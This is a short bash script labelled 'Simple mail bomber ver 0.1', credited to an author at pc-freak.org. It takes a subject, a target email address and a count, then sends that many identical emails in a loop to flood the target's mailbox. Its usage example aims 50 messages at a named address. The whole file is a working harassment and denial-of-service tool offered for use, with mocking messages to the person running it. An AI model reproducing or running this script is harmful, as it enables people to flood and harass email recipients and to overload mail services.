#!/bin/bash
# Written by hip0 -===www.pc-freak.org
# Simple mail bomber ver 0.1
if [ "$#" != "3" ]; then
printf "Wrong Syntax:\n";
echo "Syntax is: $0 subject_of_the_message user@host [ how many times ]";
echo "Example ./sbomber foolish_you bill@gates.com 50"
echo "The Above will send 50 mails to bill@gates.com with"
echo "Subject foolish_you"
exit 0
else
printf "\n\a\a\t Simple Mail bomber Ver 0.1"
printf "Flooding the $2's mailbox:-]]]with $3 mails\n\n|-Sit back and relax-|\n"
for i in `seq 1 $3`; do
echo "!*Sended shits: $i"
echo "$1" | mail -s "$1" $2 2>&1 > /dev/null 
done
fi
